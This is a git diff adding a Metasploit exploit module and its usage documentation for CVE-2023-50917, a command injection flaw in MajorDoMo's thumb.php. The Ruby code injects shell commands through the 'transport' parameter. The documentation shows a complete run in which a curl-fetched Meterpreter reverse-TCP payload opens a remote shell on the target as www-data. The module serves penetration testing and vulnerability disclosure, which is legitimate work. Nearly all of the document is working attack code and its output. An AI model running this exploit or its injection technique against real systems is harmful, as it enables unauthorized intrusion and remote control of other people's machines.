diff --git a/documentation/modules/exploit/linux/http/majordomo_cmd_inject_cve_2023_50917.md b/documentation/modules/exploit/linux/http/majordomo_cmd_inject_cve_2023_50917.md new file mode 100644 index 000000000000..c293a61e32e2 --- /dev/null +++ b/documentation/modules/exploit/linux/http/majordomo_cmd_inject_cve_2023_50917.md @@ -0,0 +1,129 @@ +## Vulnerable Application + +This module exploits a command injection vulnerability in MajorDoMo versions before 0662e5e. To set up a test environment: + +1. Download MajorDoMo by executing the following command: +``` +curl -s https://raw.githubusercontent.com/sergejey/majordomo-rpi-install/main/install.sh | bash && bash ~/majordomo-rpi-install/install.sh +``` +2. Follow the installation script instructions to install MajorDoMo on a Raspberry Pi or a Linux-based server. +3. Ensure that the network interface is active and properly configured during installation. +4. Replace `/var/www/html/modules/thumb/thumb.php` with +https://raw.githubusercontent.com/sergejey/majordomo/1167ca408a911c98937000516588c12cc33a1ab7/modules/thumb/thumb.php. +5. After installation, verify that the MajorDoMo service is operational and accessible over the network. + + +## Verification Steps + +1. Install MajorDoMo with a version prior to 0662e5e. +2. Start msfconsole in your Metasploit environment. +3. Do: `use exploit/linux/http/majordomo_cmd_inject_cve_2023_50917` +4. Set the RHOSTS to the target IP address or hostname. +5. Do: `run` +6. If the target is vulnerable, the exploit will execute the specified payload. + +## Options + +No options + +## Scenarios + +### Successful Exploitation against MajorDoMo + +This scenario demonstrates exploiting MajorDoMo on a Linux server. + +**Environment**: +- MajorDoMo before 0662e5e +- Linux Server or Raspberry Pi +- Metasploit Framework + +**Expected Output**: + +``` +msf6 > search cve_2023_50917 + +Matching Modules +================ + + # Name Disclosure Date Rank Check Description + - ---- --------------- ---- ----- ----------- + 0 exploit/linux/http/majordomo_cmd_inject_cve_2023_50917 2023-12-15 excellent Yes MajorDoMo Command Injection + + +Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/majordomo_cmd_inject_cve_2023_50917 + +msf6 > use 0 +[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp +msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > options +Module options (exploit/linux/http/majordomo_cmd_inject_cve_2023_50917): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + Proxies no A proxy chain of format typ + e:host:port[,type:host:port + ][...] + RHOSTS yes The target host(s), see htt + ps://docs.metasploit.com/do + cs/using-metasploit/basics/ + using-metasploit.html + RPORT 80 yes The target port (TCP) + SSL false no Negotiate SSL/TLS for outgo + ing connections + TARGETURI / yes The URI path to MajorDoMo + VHOST no HTTP server virtual host + + +Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp): + + Name Current Setting Required Description + ---- --------------- -------- ----------- + FETCH_COMMAND CURL yes Command to fetch paylo + ad (Accepted: CURL, FT + P, TFTP, TNFTP, WGET) + FETCH_DELETE false yes Attempt to delete the + binary after execution + FETCH_FILENAME GRigjGGzCVI no Name to use on remote + system when storing pa + yload; cannot contain + spaces. + FETCH_SRVHOST no Local IP to use for se + rving payload + FETCH_SRVPORT 8080 yes Local port to use for + serving payload + FETCH_URIPATH no Local URI to use for s + erving payload + FETCH_WRITABLE yes Remote writable dir to + _DIR store payload; cannot + contain spaces. + LHOST 192.168.1.5 yes The listen address (an + interface may be spec + ified) + LPORT 4444 yes The listen port + + +Exploit target: + + Id Name + -- ---- + 0 Automatic + + + +View the full module info with the info, or info -d command. + +msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > set rhosts 192.168.1.18 +rhosts => 192.168.1.18 +msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > exploit +[*] Started reverse TCP handler on 192.168.1.5:4444 +[*] Running automatic check ("set AutoCheck false" to disable) +[*] Checking if 192.168.1.18:80 can be exploited! +[+] Target is identified as MajorDoMo instance +[*] Performing command injection test issuing a sleep command of 9 seconds. +[*] Elapsed time: 9.112166871999989 seconds. +[+] The target is vulnerable. Successfully tested command injection. +[*] Sending stage (3045380 bytes) to 192.168.1.18 +[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 192.168.1.18:60054) at 2023-12-21 23:56:54 +0100 + +meterpreter > getuid +Server username: www-data +``` diff --git a/modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb b/modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb new file mode 100644 index 000000000000..318d7f4c264f --- /dev/null +++ b/modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb @@ -0,0 +1,95 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'MajorDoMo Command Injection', + 'Description' => %q{ + This module exploits a command injection vulnerability in MajorDoMo + versions before 0662e5e. + }, + 'Author' => [ + 'Valentin Lobstein', # Vulnerability discovery and Metasploit Module + 'smcintyre-r7', # Assistance + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', '2023-50917'], + ['URL', 'https://github.com/Chocapikk/CVE-2023-50917'], + ['URL', 'https://chocapikk.com/posts/2023/cve-2023-50917'], + ['URL', 'https://github.com/sergejey/majordomo'] # Vendor URL + ], + 'DisclosureDate' => '2023-12-15', + 'Notes' => { + 'Stability' => [ CRASH_SAFE ], + 'SideEffects' => [ IOC_IN_LOGS ], + 'Reliability' => [ REPEATABLE_SESSION ] + }, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD], + 'Targets' => [['Automatic', {}]], + 'Privileged' => false + ) + ) + + register_options([ + Opt::RPORT(80), + OptString.new('TARGETURI', [true, 'The URI path to MajorDoMo', '/']), + ]) + end + + def execute_command(cmd) + send_request_cgi( + 'uri' => normalize_uri(datastore['TARGETURI'], 'modules', 'thumb', 'thumb.php'), + 'method' => 'GET', + 'vars_get' => { + 'url' => Rex::Text.encode_base64('rtsp://'), + 'debug' => '1', + 'transport' => "|| $(#{cmd});" + } + ) + end + + def exploit + execute_command(payload.encoded) + end + + def check + print_status("Checking if #{peer} can be exploited!") + res = send_request_cgi( + 'uri' => normalize_uri(datastore['TARGETURI'], 'favicon.ico'), + 'method' => 'GET' + ) + + unless res && res.code == 200 + return CheckCode::Unknown('Did not receive a response from target.') + end + + unless Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1' + return CheckCode::Safe('The target is not MajorDoMo.') + end + + print_good('Target is identified as MajorDoMo instance') + sleep_time = rand(5..10) + print_status("Performing command injection test issuing a sleep command of #{sleep_time} seconds.") + res, elapsed_time = Rex::Stopwatch.elapsed_time do + execute_command("sleep #{sleep_time}") + end + print_status("Elapsed time: #{elapsed_time} seconds.") + unless res && elapsed_time >= sleep_time + return CheckCode::Safe('Failed to test command injection.') + end + + CheckCode::Vulnerable('Successfully tested command injection.') + end +end